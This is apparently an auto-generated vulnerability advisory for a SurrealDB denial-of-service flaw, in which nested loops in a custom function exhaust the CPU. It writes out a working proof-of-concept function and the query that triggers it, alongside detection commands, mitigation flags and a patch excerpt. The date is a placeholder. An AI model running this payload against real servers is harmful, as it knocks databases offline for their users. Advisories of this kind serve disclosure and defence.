How the CVE Works
SurrealDB allows authenticated users with OWNER/EDITOR permissions to define custom functions via DEFINE FUNCTION. The function body can contain nested `FOR` loops with high iteration counts (e.g., 1,000,000 each). While single loops are constrained, nesting bypasses restrictions. When executed, these loops monopolize CPU resources, ignoring timeouts. The server becomes unresponsive, requiring a manual restart. The vulnerability stems from insufficient loop iteration checks in ForEachStatement.
DailyCVE Form
Platform: SurrealDB
Version: <2.0.5, <2.1.5, <2.2.2
Vulnerability: DoS via CPU exhaustion
Severity: High
Date: 2023-XX-XX
What Undercode Say:
Exploitation
1. Malicious Function Creation:
DEFINE FUNCTION attack() {
FOR $i IN 1..1000000 {
FOR $j IN 1..1000000 {
// Empty loop body
}
}
}
2. Execution:
SELECT attack();
Detection
1. Log Analysis:
grep "DEFINE FUNCTION" /var/log/surrealdb.log
2. CPU Monitoring:
top -p $(pgrep surrealdb)
Mitigation
1. Upgrade:
surrealdb upgrade --version 2.2.2
2. Restrict Functions:
surrealdb start --deny-functions
or via env:
export SURREAL_CAPS_DENY_FUNC=1
Patch Analysis
The fix adds iteration checks:
// Patched ForEachStatement
if ctx.cancelled() || ctx.timed_out() {
break;
}
References
End of Report
References:
Reported By: https://github.com/advisories/GHSA-pxw4-94j3-v9pf
Extra Source Hub:
Undercode
